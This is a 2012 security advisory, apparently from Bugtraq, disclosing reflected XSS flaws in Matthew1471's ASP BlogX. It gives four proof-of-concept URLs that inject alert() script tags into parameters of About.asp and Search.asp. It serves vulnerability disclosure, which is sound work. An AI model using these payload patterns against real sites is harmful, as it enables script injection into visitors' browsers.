Matthew1471s ASP BlogX - XSS Vulnerabilities



Title: Matthew1471s ASP BlogX - XSS Vulnerabilities

Software : Matthew1471s ASP BlogX

Software Version : 12 August 2008

Vendor: http://blogx.co.uk/

Vulnerability Published : 2012-03-26

Vulnerability Update Time :

Status :

Impact : Medium(CVSS2 Base : 5.0, AV:N/AC:L/Au:N/C:P/I:N/A:N)

Bug Description :
Matthew1471s ASP BlogX(version update : 12 August 2008) is vulnerable to XSS.

Proof Of Concept :
1)ShowOriginal in About.asp , PoC:
http://VICTIM/About.asp?ShowOriginal=";><SCRIPT>alert("demonalex");</SCRIPT>&ShowNew=a&ShowChanges=b

2)ShowNew in About.asp , PoC:
http://VICTIM/About.asp?ShowOriginal=Y&ShowNew=";><SCRIPT>alert("demonalex");</SCRIPT>&ShowChanges=b

3)ShowChanges in About.asp , PoC:
http://VICTIM/About.asp?ShowOriginal=Y&ShowNew=a&ShowChanges=";><SCRIPT>alert("demonalex");</SCRIPT>

4)Search in Search.asp , PoC:
http://VICTIM/Search.asp?Search=</title><SCRIPT>alert("demonalex");</SCRIPT>&Page=0

Credits : This vulnerability was discovered by demonalex(at)163(dot)com
mail: demonalex(at)163(dot)com / ChaoYi.Huang@xxxxxxxxxxxxxxxx
Pentester/Researcher
Dark2S Security Team/PolyU.HK



Relevant Pages

  • CA ARCserve D2D r15 Web Service Apache Axis2 World Accessible Servlet Code Execution Vulnerability
    ... Code Execution Vulnerability Poc ... carries a world accessible Apache Axis2 Web Service with default credentials. ...
    (Bugtraq)
  • Multiple vulnerabilities in osCmax
    ... Vulnerability Type: ... This can be exploited to execute arbitrary HTML and script code in user's browser session in context of affected website. ... The following PoC demonstrates the vulnerability: ... Successful exploitation of this vulnerability requires that "register_globals" is enabled. ...
    (Bugtraq)
  • Multiple SQL Injection vulnerabilities in ClipBucket
    ... Vendor Notification: November 7, 2012 ... High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in ClipBucket, which can be exploited to perform SQL Injection attacks. ... The following PoC codes demonstrate the vulnerabilities. ... The third PoC code demonstrates vulnerability exploitation by blind SQL injection technique: ...
    (Bugtraq)
  • Multiple SQL Injection vulnerabilities in ClipBucket
    ... Vendor Notification: November 7, 2012 ... High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in ClipBucket, which can be exploited to perform SQL Injection attacks. ... The following PoC codes demonstrate the vulnerabilities. ... The third PoC code demonstrates vulnerability exploitation by blind SQL injection technique: ...
    (Bugtraq)
  • CPANEL File Manager XSS Vulnerability
    ... Cpanel File Manager XSS Vulnerability ... that poc exploit works for both file manager application. ...
    (Bugtraq)